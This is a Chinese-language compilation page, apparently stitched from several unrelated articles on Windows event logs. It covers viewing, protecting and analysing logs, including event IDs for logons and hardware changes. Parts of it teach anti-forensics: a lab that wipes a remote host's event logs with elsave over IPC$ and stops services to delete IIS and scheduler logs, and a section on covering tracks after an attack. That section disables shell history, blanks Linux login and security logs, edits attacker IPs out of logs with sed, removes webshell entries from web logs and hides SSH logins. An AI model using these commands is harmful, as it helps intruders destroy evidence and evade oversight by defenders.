精华内容
下载资源
问答
  • 2021-07-15 02:07:48

    日志文件,它记录着Windows 及其各种服务运行的每个细节,对加强 Windows的稳定和安全性,起着十分 重要的作用。但许多用户不注意对它保护,一些“不速之客”很随便 就将日志文件清空,给系统带来严重的安全隐患。

    一、什么是日志文件

    日志文件是Windows 中一个比较特殊的文件,它记录着Windows 中所发作 的一切,如各种系统服务的启动、运行、关闭等信息。 Windows日志包括应用程序、安全、系统等几个部分,它的保存 路径是“%systemroot%system32config”,应用程序日志、安全日志和系统日志对应的文件名为AppEvent.evt、SecEvent.evt和SysEvent.evt。这些文件遭到 “Event Log(事情 记录)”服务的保护不能被删除,但可以被清空。

    二、如何查看日志文件

    在Windows 中查看日志文件很简单。点击“开始→设置→控制面板→管理工具→事情 查看器”,在事情 查看器窗口左栏中列出本机包含的日志类型,如应用程序、安全、系统等。查看某个日志记录也很简单,在左栏当选 中某个类型的日志,如应用程序,接着在右栏中列出该类型日志的一切 记录,双击其中某个记录,弹出“事情 属性”对话框,显示出该记录的详细信息,这样我们就能精确 的控制 系统中到底发作 了什么事情,是否影响Windows的正常运行,一旦出现问题,即时查找排除。

    三、Windows日志文件的保护

    日志文件对我们如此重要,因而 不能无视 对它的保护,避免 发作 某些“不法之徒”将日志文件清洗一空的状况 。

    1. 修改日志文件保存 目录

    Windows日志文件默认路径是“%systemroot%system32config”,我们可以通过修改注册表来改动 它的存储目录,来加强 对日志的保护。

    点击“开始→运行”,在对话框中输入“Regedit”,回车后弹出注册表编辑器,依次展开 “HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/Eventlog”后,下面的 Application、Security、System几个子项分别对应应用程序日志、安全日志、系统日志。

    笔者以应用程序日志为例,将其转移到“d:cce”目录下。选中Application子项,在右栏中找到File键,其键值为应用程序日志文件的路径“%SystemRoot%system32configAppEvent.Evt”,将它修改为“d:cceAppEvent.Evt”。接着在D 盘新建“CCE”目录,将“AppEvent.Evt”拷贝到该目录下,重新启动系统,完成应用程序日志文件保存 目录的修改。其它类型日志文件路径修改方法相同,只是在不同的子项下操作。

    2. 设置文件访问权限

    修改了日志文件的保存 目录后,日志还是可以被清空的,下面通过修改日志文件访问权限,避免 这种事情发作 ,前提是Windows 要采用NTFS文件系统格式。

    右键点击D盘的CCE目录,选择“属性”,切换到“安全”标签页后,首先取消“允许未来 自父系的可继承权限传播给该对象”选项勾选。接着在账号列表框当选 中“Everyone”账号,只给它赋予“读取”权限;然后点击“添加”按钮,将“System”账号添加到账号列表框中,赋予除“完全控制”和“修改”以外的一切 权限,最后点击“确定”按钮。这样当用户清空 Windows日志时,就会弹出错误对话框。

    四、Windows日志实例剖析

    在Windows日志中记录了很多操作事情 ,为了方.便 用户对它们的管理,每品种 型的事情 都赋予了一个唯一 的编号,这就是事情 ID。

    1. 查看正常开关机记录

    在Windows 中,我们可以通过事情 查看器的系统日志查看计算机的开、关机记录,这是由于 日志服务会随计算机一同 启动或关闭,并在日志中留下记录。这里我们要介绍两个事情 ID“6006和6005”。6005表示事情 日志服务已启动,假如 在事情 查看器中发现某日的事情 ID号为6005的事情 ,就说明在这天正常启动了Windows 。6006表示事情 日志服务已停止,假如 没有在事情 查看器中发现某日的事情 ID号为6006的事情 ,就表示计算机在这天没有正常关机,可能是由于 系统原因或者直接切断电源导致没有执行正常的关机操作。

    2. 查看DHCP配置正告 信息

    在范围 较大的网络中,一般都是采用DHCP服务器配置客户端IP地址信息,假如 客户机无法找到DHCP服务器,就会自动使用一个内部的IP地址配置客户端,并且在Windows日志中产生一个事情 ID号为1007的事情 。假如 用户在日志中发现该编号事情 ,说明该机器无法从DHCP服务器取得 信息,就要查看是该机器网络问题 还是DHCP服务器问题。

    更多相关内容
  • windows日志文件查看与清理

    千次阅读 2021-09-12 19:12:50
    日志查看 (1) 启动Windows实验台,点击:开始 - 控制面板 - 管理工具 - ...安全日志文件:%systemroot%\system32\config\SecEvent.EVT; 系统日志文件:%systemroot%\system32\config\SysEvent.EVT; 应用程序日志文件

    日志查看

    (1) 启动Windows实验台,点击:开始 - 控制面板 - 管理工具 - 事件查看器。如下图所示。 在这里插入图片描述

    (2) 应用程序日志、安全日志、系统日志、DNS日志默认位置:%sys temroot%\system32\config,默认文件大小512KB,管理员可以改变这个默认大小。

    安全日志文件:%systemroot%\system32\config\SecEvent.EVT;

    系统日志文件:%systemroot%\system32\config\SysEvent.EVT;

    应用程序日志文件:%systemroot%\system32\config\AppEvent.EVT;

    DNS日志:%systemroot%\system32\config\DnsEvent.EVT;

    在事件查看器中右键应用程序(或安全性、系统、DNS服务器)查看属性可以得到日志存放文件的路径,并可修改日志文件的大小,清除日志。例如选中“应用程序”右键属性,如下图:

    在这里插入图片描述

    选中事件查看器中左边的树形结构图中的日志类型(应用程序、安全性或系统),右击“查看”,并选择“筛选”。或者点击属性页面的筛选器标签,日志筛选器将会启动。通过筛选器系统会过滤出管理员希望查看的日志记录

    (3) 查看www和ftp日志文件夹下的日志文件

    (由于实验环境中不允许访问互联网,无法操作得出日志文件。请参考指导书使用个人电脑进行实验。)

    尝试对www服务中某一文件进行访问,则日志中则会有相应的日志记录如下图。

    在这里插入图片描述

    日志中记录了访问www服务的请求地址,管理员可以根据请求地址,发现网络上的攻击,管理员可根据日志信息,采取一定的防护措施。

    在这里插入图片描述

    ftp的日志中同样会记录ftp服务的登陆用户,以及登陆之后的操作。

    (4) 计划任务日志

    当入侵者得到远程系统的shell之后,常会利用计划任务运行功能更加强大的木马程序,计划任务日志详细的记录的计划任务的执行时间,程序名称等详细信息。

    打开计划任务文件夹,点击“高级”-查看日志,即可查看计划任务日志。

    在这里插入图片描述

    日志清除

    (1) 删除事件查看器中的日志

    主机下载使用elsave清除日志工具

    下载地址:http://tools.hetianlab.com/tools/Elsave.rar

    先用ipcKaTeX parse error: Undefined control sequence: \ipc at position 42: …e \\对方IP(实验台IP)\̲i̲p̲c̲ “密码” /user:“用户名”;

    连接成功后,开始进行日志清除。

    清除目标系统的应用程序日志输入elsave.exe -s \对方ip -l “application” -C

    清除目标系统的系统日志输入elsave.exe -s \对方IP -l “system” -C

    清除目标系统的安全日志输入elsave.exe -s \对方IP -l “security” -C

    输入如下图

    在这里插入图片描述

    回车后可以查看远程主机内的系统日志已经被删除了

    在这里插入图片描述

    (2) 删除常见服务日志

    IIS的日志功能,它可以详细的记录下入侵全过程,如用unicode入侵时IE里打的命令,和对80端口扫描时留下的痕迹。

    手动清除:日志的默认位置:%systemroot%\system32\logfiles\w3svc1\,默认每天一个日志。进入到远程主机后(也可直接在实验台中操作),cmd下切换到这个目录下,然后 del .。或者删除某一天的日志。如果无法删除文件,首先需要停止w3svc服务,再对日志文件进行删除,使用net 命令停止服务如下:

    C:>net stop w3svc

    World Wide Web Publishing Service 服务正在停止。

    World Wide Web Publishing Service 服务已成功停止。

    日志w3svc停止后,然后清空它的日志, del .

    C:>net start w3svc

    清除ftp日志,日志默认位置:%systemroot%\sys tem32\logfiles\msftpsvc1\,默认每天一个日志,清除方法同上。

    (3) 删除计划任务日志

    先来删除计划任务日志:

    在实验台中命令行进入日志所在文件夹下(%systemroot%\Tasks), 删除schedlgu.txt , 提示无法访问文件,因为另一个程序正在使用此文件。说明服务保护,需要先把服务停掉。命令行中输入net stop schedule;

    在这里插入图片描述

    下面的服务依赖于Task Scheduler 服务。停止Task Scheduler 服务也会停止这些服务。

    Remote Storage Engine

    Task Scheduler 服务正在停止. Task Scheduler 服务已成功停止。

    如上显示服务停掉了,同时也停掉了与它有依赖关系的服务。再来删除schedlgu.txt;

    删除后需要再次启动该任务以便主机能够正常工作,输入net start schedule:

    在这里插入图片描述
    答案

    在这里插入图片描述

    分析与思考

    1、还有哪些途径可以发现网络中存在的攻击或者入侵。

    日志文件、进程、自启动项目、网络连接、安全模式、映像劫持、CPU时间

    2、清理日志能否把所有的痕迹都清理干净。

    不能,还应删除操作记录,所做的每一个操作,都要被抹掉;所上传的工具,都应该被安全地删掉

    补充
    电脑被入侵排查方法

    一、进程
    首先排查的就是进程了,方法简单,开机后,什么都不要启动!
    第一步:直接打开任务管理器,查看有没有可疑的进程,不认识的进程可以Google或者百度一下。
    PS:如果任务管理器打开后一闪就消失了,可以判定已经中毒;如果提示已经被管理员禁用,则要引起警惕!
    第二步:打开冰刃等软件,先查看有没有隐藏进程(冰刃中以红色标出),然后查看系统进程的路径是否正确。
    PS:如果冰刃无法正常使用,可以判定已经中毒;如果有红色的进程,基本可以判断已经中毒;如果有不在正常目录的正常系统进程名的进程,也可以判断已经中毒。
    第三步:如果进程全部正常,则利用Wsyscheck等工具,查看是否有可疑的线程注入到正常进程中。
    PS:Wsyscheck会用不同颜色来标注被注入的进程和正常进程,如果有进程被注入,不要着急,先确定注入的模块是不是病毒,因为有的杀软也会注入进程。
    二、自启动项目
    进程排查完毕,如果没有发现异常,则开始排查启动项。
    第一步:用msconfig察看是否有可疑的服务,开始,运行,输入“msconfig”,确定,切换到服务选项卡,勾选“隐藏所有Microsoft服务”复选框,然后逐一确认剩下的服务是否正常(可以凭经验识别,也可以利用搜索引擎)。
    PS:如果发现异常,可以判定已经中毒;如果msconfig无法启动,或者启动后自动关闭,也可以判定已经中毒。
    第二步:用msconfig察看是否有可疑的自启动项,切换到“启动”选项卡,逐一排查就可以了。
    第三步,用Autoruns等,查看更详细的启动项信息(包括服务、驱动和自启动项、IEBHO等信息)。
    PS:这个需要有一定的经验。
    三、网络连接
    ADSL用户,在这个时候可以进行虚拟拨号,连接到Internet了。
    然后直接用冰刃的网络连接查看,是否有可疑的连接,对于IP地址,可以到http://www.ip138.com/查询,对应的进程和端口等信息可以到Google或百度查询。
    如果发现异常,不要着急,关掉系统中可能使用网络的程序(如迅雷等下载软件、杀毒软件的自动更新程序、IE浏览器等),再次查看网络连接信息。
    四、安全模式
    重启,直接进入安全模式,如果无法进入,并且出现蓝屏等现象,则应该引起警惕,可能是病毒入侵的后遗症,也可能病毒还没有清除!
    五、映像劫持
    打开注册表编辑器,定位到HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsNTCurrentVersionImageFileExecutionOpti,查看有没有可疑的映像劫持项目,如果发现可疑项,很可能已经中毒。
    六、CPU时间
    如果开机以后,系统运行缓慢,还可以用CPU时间做参考,找到可疑进程,方法如下:
    打开任务管理器,切换到进程选项卡,在菜单中点“查看”,“选择列”,勾选“CPU时间”,然后确定,单击CPU时间的标题,进行排序,寻找除了SystemIdleProcess和SYSTEM以外,CPU时间较大的进程,这个进程需要一起一定的警惕。
    

    在攻击结束后,如何不留痕迹的清除日志和操作记录,以掩盖入侵踪迹,这其实是一个细致的技术活。你所做的每一个操作,都要被抹掉;你所上传的工具,都应该被安全地删掉。

    01、清除history历史命令记录
    
    第一种方式:
    
    (1)编辑history记录文件,删除部分不想被保存的历史命令。
    
    vim~/.bash_history
    
    (2)清除当前用户的history命令记录
    
    history-c
    
    第二种方式:
    
    (1)利用vim特性删除历史命令
    
    #使用vim打开一个文件
    
    vitest.txt
    
    #设置vim不记录命令,Vim会将命令历史记录,保存在viminfo文件中。
    
    :sethistory=0
    
    #用vim的分屏功能打开命令记录文件.bash_history,编辑文件删除历史操作命令
    
    vsp~/.bash_history
    
    #清除保存.bash_history文件即可。
    
    (2)在vim中执行自己不想让别人看到的命令
    
    :sethistory=0
    
    :!command
    
    第三种方式:
    
    通过修改配置文件/etc/profile,使系统不再保存命令记录。
    
    HISTSIZE=0
    
    第四种方式:
    
    登录后执行下面命令,不记录历史命令(.bash_history)
    
    unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
    
    02、清除系统日志痕迹
    
    Linux 系统存在多种日志文件,来记录系统运行过程中产生的日志。
    
    /var/log/btmp记录所有登录失败信息,使用lastb命令查看
    
    /var/log/lastlog记录系统中所有用户最后一次登录时间的日志,使用lastlog命令查看
    
    /var/log/wtmp记录所有用户的登录、注销信息,使用last命令查看
    
    /var/log/utmp记录当前已经登录的用户信息,使用w,who,users等命令查看
    
    /var/log/secure记录与安全相关的日志信息
    
    /var/log/message记录系统启动后的信息和错误日志
    
    第一种方式:清空日志文件
    
    清除登录系统失败的记录:
    
    [root@centos]#echo>/var/log/btmp
    
    [root@centos]#lastb//查询不到登录失败信息
    
    清除登录系统成功的记录:
    
    [root@centos]#echo>/var/log/wtmp
    
    [root@centos]#last//查询不到登录成功的信息
    
    清除相关日志信息:
    
    清除用户最后一次登录时间:echo>/var/log/lastlog#lastlog命令
    
    清除当前登录用户的信息:echo>/var/log/utmp#使用w,who,users等命令
    
    清除安全日志记录:cat/dev/null>/var/log/secure
    
    清除系统日志记录:cat/dev/null>/var/log/message
    
    第二种方式:删除/替换部分日志
    
    日志文件全部被清空,太容易被管理员察觉了,如果只是删除或替换部分关键日志信息,那么就可以完美隐藏攻击痕迹。
    
    #删除所有匹配到字符串的行,比如以当天日期或者自己的登录ip
    
    sed-i'/自己的ip/'d/var/log/messages
    
    #全局替换登录IP地址:
    
    sed-i's/192.168.166.85/192.168.1.1/g'secure
    
    03、清除web入侵痕迹
    
    第一种方式:直接替换日志ip地址
    
    sed-i's/192.168.166.85/192.168.1.1/g'access.log
    
    第二种方式:清除部分相关日志
    
    #使用grep-v来把我们的相关信息删除,
    
    cat/var/log/nginx/access.log|grep-vevil.php>tmp.log
    
    #把修改过的日志覆盖到原日志文件
    
    cattmp.log>/var/log/nginx/access.log/
    
    04、文件安全删除工具
    
    (1)shred命令
    
    实现安全的从硬盘上擦除数据,默认覆盖3次,通过 -n指定数据覆盖次数。
    
    [root@centos]#shred-f-u-z-v-n81.txt
    
    shred:1.txt:pass1/9(random)...
    
    shred:1.txt:pass2/9(ffffff)...
    
    shred:1.txt:pass3/9(aaaaaa)...
    
    shred:1.txt:pass4/9(random)...
    
    shred:1.txt:pass5/9(000000)...
    
    shred:1.txt:pass6/9(random)...
    
    shred:1.txt:pass7/9(555555)...
    
    shred:1.txt:pass8/9(random)...
    
    shred:1.txt:pass9/9(000000)...
    
    shred:1.txt:removing
    
    shred:1.txt:renamedto00000
    
    shred:00000:renamedto0000
    
    shred:0000:renamedto000
    
    shred:000:renamedto00
    
    shred:00:renamedto0
    
    shred:1.txt:removed
    
    (2)dd命令
    
    可用于安全地清除硬盘或者分区的内容。
    
    ddif=/dev/zeroof=要删除的文件bs=大小count=写入的次数
    
    (3)wipe
    
    Wipe 使用特殊的模式来重复地写文件,从磁性介质中安全擦除文件。
    
    wipefilename
    
    (4)Secure-Delete
    
    Secure-Delete 是一组工具集合,提供srm、smem、sfill、sswap,4个安全删除文件的命令行工具。
    
    srmfilename
    
    sfillfilename
    
    sswap/dev/sda1
    
    smem
    
    05、隐藏远程SSH登陆记录
    
    隐身登录系统,不会被w、who、last等指令检测到。
    
    ssh-Troot@192.168.0.1/bin/bash-i
    
    不记录ssh公钥在本地.ssh目录中
    
    ssh-oUserKnownHostsFile=/dev/null-Tuser@host/bin/bash–i
    
    展开全文
  • (转)日志对于操作系统来说其重要性时不言而喻的,一个...windows脚本编程包括vbscript和javascript,这也是网页特效编程中常见的语言,实际上利用vbs和js强大的系统和网络管理功能,可以使系统管理员简化很多工作的。
  • windows系统下日志清理

    2017-11-14 21:50:35
    能够在为在Windows系统下定时清理服务器生成的日志,里面包括详细的操作说明及源码
  • 1、通过学习日志文件包含漏洞,掌握在目标服务器存在文件包含漏洞的前提下没有上传功能下获取权限的方法。 2、通过搭建漏洞环境,学习绕过技巧。 二、工具: 火狐/谷歌浏览器 burpsuite 三、实验环境: 靶 机:...

    一、实验目的:

    1、通过学习日志文件包含漏洞,掌握在目标服务器存在文件包含漏洞的前提下没有上传功能下获取权限的方法。
    2、通过搭建漏洞环境,学习绕过技巧。

    二、工具:

    火狐/谷歌浏览器
    burpsuite

    三、实验环境:

    靶 机: windows10虚拟机:192.168.100.150
          phpstudy2018_Apache集成环境
          DVWA靶场

    攻击机: 物理机

    四、原理说明:

    1. 原理:

      当某个PHP文件存在本地包含漏洞,而却无法上传正常文件,这就意味这有包含漏洞却不能拿来利用,这时攻击者就有可能会利用apache日志文件来入侵
      Apache服务器运行后会生成两个日志文件,这两个文件是access.log(访问日志)error.log(错误日志),apache的日志文件记录下我们的操作,并且写到访问日志文件access.log之中。

    2. 利用方法:

    过日志文件getshell
    1.通过burpsuite发送的请求包产生日志数据;
    2.包含日志文件;
    3.写入一句话木马getshell

    五、日志文件相关:

    1. 日志文件路径:

    E:\php\phpstudy_2018\PHPTutorial\Apache\logs\
    

    这里主要查看access.log这个日志,这个日志记录着服务器所有的访问记录,包括一些攻击流量:

    2. 没有access.log访问日志的原因:

    进入日志目录下,如果发现没有access.log这个访问日志,是因为apache配置文件没有打开这个配置选项,需要对相应的功能进行开启。

    3. 开启access.log访问日志功能:

    1、通过配置文件的开启access.log访问日志功能:

    2、搜索CustomLog "logs/access.log" common,将前面的##注释去掉,并保存文件,然后重启PHPstudy:

    3、查看访问日志文件,日志目录下已经出现这个文件,说明成功开启访问日志功能:

    4、访问几个网页,查看记录,对自己访问的页面有记录,说明access.log可以自动记录访问操作:

    六、实验过程:

    1、我们通过访问,让访问日志记录我们的phpinfo();代码,可以看出,访问日志已经成功记录了我们的访问历史:
    访问内容:

    <?php phpinfo();?>
    


    注:通过上图我们可以看出,日志已经成功记录我们的访问历史,但是是经过URL编码后的结果。如何让它记录我们原始完整的代码呢?一般URL编码是我们的浏览器进行完成的,它对我们访问的目录做了URL编码,然后发送到服务器,我们可以通过burpsuite,把经过浏览器URL编码后的数据进行修改。
    2、使用burpsuite修改编码后的数据:

    3、查看访问日志,可以看出,没有编码的phpinfo();代码已经成功记录:

    4、文件包含只要文件中有php代码,它就会把这个文件当做php脚本进行解析,这样我们可以包含这个日志文件,让目标服务器把日志文件解析为php脚本;可以看出,已经成功解析日志文件为php脚本:

    5、让访问日志文件记录下写入文件脚本代码:
    访问内容:

    <?php 
    $file=fopen('test1.php','w');
    fputs($file,'<?php @eval($_POST[666]);?>');
    ?>
    


    6、对访问日志进行文件包含,并查看创建的一句话脚本,已经创建成功:

    7、使用蚁剑连接webshell,成功获得靶机的webshell权限:

    展开全文
  • 监视文本日志文件Windows EventLog的尾部实用程序 监视“大”文本日志文件 监视Windows事件日志(无需管理员权限) 支持多种窗口模式(MDI,选项卡式,浮动式) 保存并加载整个窗口会话。 作为命令行参数给定时...
  • node-windows, Windows 对 node.js 脚本( 守护进程事件日志UAC等)的支持 更新 (2/11/17)Gitter自 2015年以来一直在解决的许多问题都已经得到解决,包括. NET 4 + 支持。这个项目和它的姐妹项目( 节点 mac & 节点 ...
  • Windows日志

    万次阅读 多人点赞 2019-05-29 16:29:26
    文章目录一,Windows事件日志简介二,打开事件查看器命令:eventvwr三,Windows事件日志共有五种事件级别四,Windows日志文件五,对常用安全事件的分析1.用户登录与注销2.追踪硬件变动3.追踪WiFi信息六,日志获取和...

    学习目标

    1. Windows事件日志简介:存储位置、内容、查看方法。
    2. Windows事件日志分析:开关机、登录、注销、连接网络、插U盘。
    3. 安全审核:TCP、UDP。

    一,Windows事件日志简介

    Windows事件日志记录着Windows系统中发生的各类事件。通过事件日志,可以监控用户对系统的使用情况,掌握计算机在特定时间发生了什么事件,此外也可以了解用户的各种操作行为。因此,它可以为调查提供很多关键信息。

    二,打开事件查看器命令:eventvwr

    在这里插入图片描述
    Windows事件日志文件本质上是数据库,其中包括有关系统、安全、应用程序的记录

    记录的事件包含9个元素:日期/时间、事件级别、用户、计算机、事件ID、来源、任务类别、描述、数据等信息。

    在这里插入图片描述

    三,Windows事件日志共有五种事件级别

    所有的事件必须只能拥有其中的一种事件级别

    1.信息(Information)
    信息事件指应用程序、驱动程序或服务的成功操作的事件。
    2.警告(Warning)
    警告事件指不是直接的、主要的,但是会导致将来问题发生的问题。例如,当磁盘空间不足或未找到打印机时,都会记录一个“警告”事件。
    3.错误(Error)
    错误事件指用户应该知道的重要的问题。错误事件通常指功能和数据的丢失。例如, 如果一个服务不能作为系统引导被加载,那么它会产生一个错误事件。
    4. 成功审核(Success audit)
    成功的审核安全访问尝试,主要是指安全性日志,这里记录着用户登录/注销、对象访问、特权使用、账户管理、策略更改、详细跟踪、目录服务访问、账户登录等事件,例如所有的成功登录系统都会被记录为“成功审核”事件。
    5.失败审核(Failure audit)
    失败的审核安全登录尝试,例如用户试图访问网络驱动器失败,则该尝试会被作为失败审核事件记录下来。

    四,Windows日志文件

    从1993年的Windows NT3.1起,微软就开始使用事件日志来记录各种事件的信息。在NT的进化过程中,事件日志的文件名和文件存放位置一直保持不变,在Windows NT/Win2000/XP/Server 2003中, 日志文件的扩展名一直是evt,存储位置为“%systemroot%\System32\config”。

    从Windows Vista和Server 2008开始,日志文件的文件名、结构和存储位置发生了巨大改变, 文件扩展名改为evtx (XML格式),存储位置改为“%systemroot%\System32\WinEvt\logs”

    ri在这里插入图片描述
    1、系统日志
    记录操作系统组件产生的事件,主要包括驱动程序、系统组件和应用软件的崩溃以及数据。

    默认位置:
    Vista/Win7/Win8//Win10/Server 2008/Server 2012
    C:WINDOWS\system32\winevt\Logs\System.evtx

    2.应用程序日志
    包含由应用程序或系统程序记录的事件,主要记录程序运行方面的事件。

    默认位置:
    Vista/Win7/Win8//Win10/Server 2008/Server 2012
    C:\WINDOWS\system32\winevt\Logs\Application.evtx

    3.安全日志
    记录系统的安全审计事件,包含各种类型的登录日志、对象访问日志、进程追踪日志、特权使用、帐号管理、策略变更、系统事件。安全日志也是调查取证中最常用到的日志。默认安全性日志是关闭的,管理员可以使用组策略来启动安全性日志,或者在注册表中设置审核策略,以便当安全性日志满后使系统停止响应。

    默认位置:
    Vista/Win7/Win8//Win10/Server 2008/Server 2012
    C:\WINDOWS\system32\winevt\Logs\Security.evtx。

    1.安全日志:是渗透测试工作人员关注的重点
    虽然几乎所有事件记录在调查过程中都或多或少带来帮助,但是大多数的调查取证中,安全日志中找到线索的可能性最大。
    2.系统和应用程序日志存:储着故障排除信息,对于系统管理员更为有用。安全日志记录着事件审计信息,包括用户验证(登录、远程访问等)和特定用户在认证后对系统做了什么,对于调查人员而言,更有帮助。
    

    五,对常用安全事件的分析

    1.用户登录与注销

    场景
    .判断哪个用户尝试进行登录
    .分析被控制的用户的使用情况
    事件ID
    .4624登录成功
    .4625登录失败
    .4634/4647 一注销成功
    .4672使用超级用户(如管理员)进行登录

    2.追踪硬件变动

    场景
    .分析哪些硬件设备什么时间安装到系统中
    事件ID
    .20001 -即插即用驱动安装(System日志)
    .20003-即插即用驱动安装(System日志)
    .46636-移动设备访问成功(Securiy日志)
    .4656 -移动设备访问失败(Security日志)

    3.追踪WiFi信息

    场景
    .分析连接到的WiFi属性
    事件ID
    .10000-连接WiFi(networkprofile日志)
    .10001-断开WiFi(networkprofile日志)

    事件id10000

    六,日志获取和分析工具

    除了使用“事件日志查看器”外,我们也可以使用其他日志上具宣
    询事件日志。以下列举了一些我们经常用到的日志获取和分析工具

    .事件日志查看器
    . Microsoft LogParser
    . Log Parser Lizard

    七,分析事件的方法—筛查

    手动/脚本筛查

    1.利用PowerShell 来自动筛选 Windows 事件日志

    ①Get-WinEvent强大但发杂

     Get-WinEvent 超级强大,但使用起来比较麻烦

    Get-WinEvent -FilterHashtable @{Logname='system';Id='6006','6005'}
    

    在这里插入图片描述

    ②Get- EventLog简单但一般

     Get- EventLog 使得起来相当简单,

    Get-EventLog Security  -InstanceId  4624,4625
    

    在这里插入图片描述

    2.在powershell中对筛选出的Windows事件进一步处理

    ①用变量储存方便查看

    $events=Get-EventLog Security  -InstanceId  4624,4625
    

    例如
    在这里插入图片描述
    会发现有…显示不全–>用列表的形式
    ②用列表的形式查看全部信息

    $events[2]|fl *
    

    在这里插入图片描述

    七,分析日志的思路

    1.分析Windows登录类型

    ①登录类型

    登录类型2交互式登录(Interactive): 就是指用户在计算机的控制台上进行的登录,也就是在本地键盘上进行的登录。
    登录类型3:网络(Network): 最常见的是访问网络共享文件夹或打印机。另外大多数情况下通过网络登录IIS时也被记为这种类型,但基本验证方式的IIS登录是个例外,它将被记为类型8。
    登录类型4:批处理(Batch) :当Windows运行一个计划任务时,“计划任务服务”将为这个任务首先创建一个新的登录会话以便它能在此计划任务所配置的用户账户下运行,当这种登录出现时,Windows在日志中记为类型4,对于其它类型的工作任务系统,依赖于它的设计,也可以在开始工作时产生类型4的登录事件,类型4登录通常表明某计划任务启动,但也可能是一个恶意用户通过计划任务来猜测用户密码,这种尝试将产生一个类型4的登录失败事件,但是这种失败登录也可能是由于计划任务的用户密码没能同步更改造成的,比如用户密码更改了,而忘记了在计划任务中进行更改。
    登录类型5:服务(Service) :与计划任务类似,每种服务都被配置在某个特定的用户账户下运行,当一个服务开始时,Windows首先为这个特定的用户创建一个登录会话,这将被记为类型5,失败的类型5通常表明用户的密码已变而这里没得到更新。
    登录类型7:解锁(Unlock) :很多公司都有这样的安全设置:当用户离开屏幕一段时间后,屏保程序会锁定计算机屏幕。解开屏幕锁定需要键入用户名和密码。此时产生的日志类型就是Type 7。
    登录类型8:网络明文(NetworkCleartext) :通常发生在IIS 的 ASP登录。不推荐。
    登录类型9:新凭证(NewCredentials) :通常发生在RunAS方式运行某程序时的登录验证。
    登录类型10:远程交互(RemoteInteractive) :通过终端服务、远程桌面或远程协助访问计算机时,Windows将记为类型10,以便与真正的控制台登录相区别,注意XP之前的版本不支持这种登录类型,比如Windows2000仍然会把终端服务登录记为类型2。
    登录类型11:缓存交互(CachedInteractive) :在自己网络之外以域用户登录而无法登录域控制器时使用缓存登录。默认情况下,Windows缓存了最近10次交互式域登录的凭证HASH,如果以后当你以一个域用户登录而又没有域控制器可用时,Windows将使用这些HASH来验证你的身份。

    ②常见登录类型日志分析

    1、本地交互式登录,也就是我们每天最常使用的登录方式。
    首先是成功的登录,从日志分析来看至少会有2个事件发生,分别为ID4648、 4624。
    审核成功 2016/9/23 10:36:12 Microsoft Windows security auditing. 4648 登录
    审核成功 2016/9/23 10:36:12 Microsoft Windows security auditing. 4624 登录

    失败登录会产生ID为4625的事件日志。
    审核失败 2016/9/23 10:35:13 Microsoft Windows security auditing. 4625 登录

    2、使用RDP协议进行远程登录,这也是日常经常遇到的情况。
    使用mstsc远程登录某个主机时,使用的帐户是管理员帐户的话,成功的情况下会有ID为4648、4624、4672的事件产生。首先是成功登录, ID为4624,审核成功,登录类型为10(远程交互)。并且描述信息中的主机名(源工作站)仍为被尝试登录主机的主机名,而不是源主机名。
    审核成功 2016/9/23 16:57:55 Microsoft Windows security auditing. 4648 登录
    审核成功 2016/9/23 16:57:55 Microsoft Windows security auditing. 4624 登录
    审核成功 2016/9/23 16:57:55 Microsoft Windows security auditing. 4672 特殊登录

    使用不存在的用户名和错误密码分别登录失败,ID为4625,登录类型为10(远程交互)。审核失败,列出了登录失败的账户名和失败原因。

    3、远程访问某台主机的共享资源,如某个共享文件夹。
    首先是使用正确的用户名和密码访问远程共享主机,登录事件ID为4624, 登录类型为3(Network),审核成功。列出了源网络地址和端口。
    审核成功 2016/9/23 16:14:15 Microsoft Windows security auditing. 4624 登录

    如果访问共享资源使用的帐户名、密码正确,但是该用户对指定的共享文件夹没有访问权限时仍然会有ID为4624的认证成功事件产生。
    接下来的是事件ID为5140的文件共享日志,显示了访问的共享文件夹名称。
    审核成功 2016/9/23 16:14:15 Microsoft Windows security auditing. 5140 文件共享

    使用不存在的用户名和错误密码分别登录失败,ID为4625,登录类型为3(网络)。审核失败,列出了登录失败的账户名和失败原因。

    4、解锁登录
    解锁登录和远程登录一样,成功的情况下会有ID为4648、4624、4672的事件产生。首先是成功登录, ID为4624,审核成功,登录类型为7(Unlock)。
    审核成功 2016/9/23 16:28:41 Microsoft Windows security auditing. 4648 登录
    审核成功 2016/9/23 16:28:41 Microsoft Windows security auditing. 4624 登录
    审核成功 2016/9/23 16:28:41 Microsoft Windows security auditing. 4672 特殊登录

    使用不存在的用户名和错误密码分别登录失败,ID为4625,登录类型为7(unlock)。审核失败,列出了登录失败的账户名和失败原因。。

    最后我们总结一下“审计登录”事件:
    · 在进程尝试通过显式指定帐户的凭据来登录该帐户时生成4648事件。
    · 成功的登录通常会有4624事件产生,在创建登录会话后在被访问的计算机上生成此事件。
    · 如果用户有特权会有4672事件产生。
    · 通常情况下只需关注登录类型为2、3、7、10类型的4625登录失败事件。
    

    2.安全审核

    操作系统带有日志功能,系统审核机制可以对系统中的各类事件进行跟踪记录并写入日志文件。企业的网络管理员开启了服务器的部分安全审计功能后,可以根据需要实时地将发生在系统中的事件记录下来。可以通过查看与安全相关的日志文件的内容,来分析、查找系统和应用程序故障以及各类安全事件,发现黑客的入侵和入侵后的行为。

     审核事件ID
    审计目录服务访问
      4934 - Active Directory 对象的属性被复制
      4935 -复制失败开始
      4936 -复制失败结束
      5136 -目录服务对象已修改
      5137 -目录服务对象已创建
      5138 -目录服务对象已删除
      5139 -目录服务对象已经移动
      5141 -目录服务对象已删除
      4932 -命名上下文的AD的副本同步已经开始
      4933 -命名上下文的AD的副本同步已经结束
      审计登录事件
      4634 - 帐户被注销
      4647 - 用户发起注销
      4624 - 帐户已成功登录
      4625 - 帐户登录失败
      4648 - 试图使用明确的凭证登录
      4675 - SID被过滤
      4649 - 发现重放攻击
      4778 -会话被重新连接到Window Station
      4779 -会话断开连接到Window Station
      4800 – 工作站被锁定
      4801 - 工作站被解锁
      4802 - 屏幕保护程序启用
      4803 -屏幕保护程序被禁用
      5378 所要求的凭证代表是政策所不允许的
      5632 要求对无线网络进行验证
      5633 要求对有线网络进行验证
      审计对象访问
      5140 - 网络共享对象被访问
      4664 - 试图创建一个硬链接
      4985 - 交易状态已经改变
      5051 - 文件已被虚拟化
